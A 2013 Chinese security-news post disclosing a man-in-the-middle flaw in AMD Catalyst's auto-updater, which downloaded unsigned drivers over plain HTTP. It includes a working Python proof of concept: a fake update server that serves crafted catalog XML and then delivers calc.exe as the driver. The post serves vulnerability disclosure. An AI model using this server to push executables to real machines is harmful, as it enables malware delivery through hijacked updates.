当前位置: 爱尖刀 > 首页安全 > 漏洞补丁 > 正文

AMD 显卡催化剂自动更新程序漏洞

2013-3-19 23:01 浏览次数:370 我来说两句(0)
在2013年1月17日,AMD发布了AMD催化剂13.1,随后宣布删除自动更新的功能,当时AMD表示是因为自动更新里面存在安全问题,近日,网络爆出了该安全问题的详细信息,是因为可以利用中间人攻击劫持自动更新的请求。

漏洞存是由于:

 二进制程序的下载是通过HTTP来完成的。
 AMD执行前已签订了未通过验证。

 

这意味着,可以利用中间人攻击截获AMD技术支持网站的请求,并重定向到攻击者特制的应用页面或程序。

POC

import SimpleHTTPServer
import SocketServer

xml = """<?xml version="1.0" encoding="utf-8"?>
<list>
    <Catalyst-Driver-Files>
        <Title>Catalyst Software Suite with .NET 4 Support</Title>
        <DriverCategory>Full Catalyst Software Suite (Recommended)</DriverCategory>
        <DriverLanguage>;#All;#</DriverLanguage>
        <DriverProductType>;#1-Radeon;#3-Integrated;#18-AIW_HD;#</DriverProductType>
        <FileSize>184 MB</FileSize>
        <OSType>;#Windows Vista - 64-Bit Edition;#Windows 7 - 64-Bit Edition;#</OSType>
        <ReleaseDate>2012-10-22T00:00:00-05:00</ReleaseDate>
        <RevisionNumber>12.42</RevisionNumber>
        <RollupSortOrder>15</RollupSortOrder>
        <TextMultiple1>
        </TextMultiple1>
        <TextSingle1>http://www2.ati.com/drivers/12-10_vista_win7_win8_64_dd_ccc_whql_net4.exe</TextSingle1>
        <TechDownloadGPUSubtype>Driver</TechDownloadGPUSubtype>
        <ContentType>GraphicsDriverFile</ContentType>
        <DriverVersionSupported>;#12.42;#</DriverVersionSupported>
        <ID>956</ID>
        <Modified>2012-10-22T21:30:52-05:00</Modified>
        <Created>2012-10-22T21:30:52-05:00</Created>
        <Author>System Account</Author>
        <Editor>System Account</Editor>
        <_UIVersionString>1.0</_UIVersionString>
        <Attachments>0</Attachments>
        <TitleCN>Catalyst Software Suite</TitleCN>
        <TitleBR>Catalyst Software Suite</TitleBR>
        <TitleDE>Catalyst Software Suite</TitleDE>
        <TitleFR>Catalyst Software Suite</TitleFR>
        <TitleIT>Catalyst Software Suite</TitleIT>
        <TitleLA>Catalyst Software Suite</TitleLA>
        <DescriptionCN>
        </DescriptionCN>
        <DescriptionBR>
        </DescriptionBR>
        <DescriptionDE>
        </DescriptionDE>
        <DescriptionFR>
        </DescriptionFR>
        <DescriptionIT>
        </DescriptionIT>
        <DescriptionLA>
        </DescriptionLA>
        <TitleKR>(Catalyst Software Suite)</TitleKR>
        <DescriptionKR>
        </DescriptionKR>
        <LinkTitleNoMenu>Catalyst Software Suite with .NET 4 Support</LinkTitleNoMenu>
        <LinkTitle>Catalyst Software Suite with .NET 4 Support</LinkTitle>
    </Catalyst-Driver-Files>
</list>
"""

class ExploitHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_GET(self):
        if "catalystxml" in self.path:
            self.send_response(200)
            self.send_header('Content-type','text/xml')
            self.end_headers()
            self.wfile.write(xml)
            return
        elif ".exe" in self.path:
            self.send_response(200)
            self.send_header('Content-type','application/octet-stream')
            self.end_headers()
            f = open(r"C:\Windows\System32\calc.exe", "rb")
            self.wfile.write(f.read())
            f.close()
            return

httpd = SocketServer.ThreadingTCPServer(('0.0.0.0', 80), ExploitHandler)
httpd.serve_forever()
这个脚本是指向amd.com,www.amd.com,www.ati.com和www2.ati.com(AMD不存在的域名)的,你会观察到,AMD显卡催化剂启动更新功能之后,它会提示你更新的驱动程序,下载并执行calc.exe文件。

许多应用程序可能都存在该漏洞,老外研究开发了一款工具EvilGrade,可以查找这些安全问题。



[广告]赞助链接:

知安,互联网产品安全医院:http://www.knowsafe.com
舆情监测,互联网舆情首选查舆情:http://www.chayuqing.com/
爱尖刀科技,关注企业数据与安全:http://www.ijiandao.com

关注公众号:Mcbang_com 了解更多精彩,关注:chayuqing_com 娱乐资讯早知道!
收藏 分享 发布者: admin |
看完这篇文章,你的感受如何?


伤心


无视


惊讶


流汗


赞同


路过
热点聚焦
更多>>
情凝中秋,乐在团圆 中秋节又称团圆节,是从古代至今,对远方亲人思念之情的体现;也是东方 ... [详细]
传递爱心 帮助需要的人 中国红十字已不能信任,民政系统变的自私,在这样的环境下,很多需 ... [详细]
【D盾】- 携手啊D共推《 [详细]
父亲节(Father's D 温家宝:父爱,如大海般深沉而宽广。 我们的力量出自与父亲,我们的 ... [详细]
祝高考学子凯旋而归 明后两天,高中三年的最后两天,也是将会影响命运的两天! 3年=1095天 ... [详细]

Archiver|网络尖刀 ( 京ICP备14006288号-3 )  

GMT+8, 2017-4-28 22:13 , Processed in 0.197715 second(s), 20 queries , Gzip On.

请勿发布违反中华人民共和国法律法规的言论
郑重声明:本站会员观点不代表【网络尖刀】论坛官方立场。

Copyright© 2006-2016 IjianDao.Com All rights reserved. 网络尖刀 版权所有

回顶部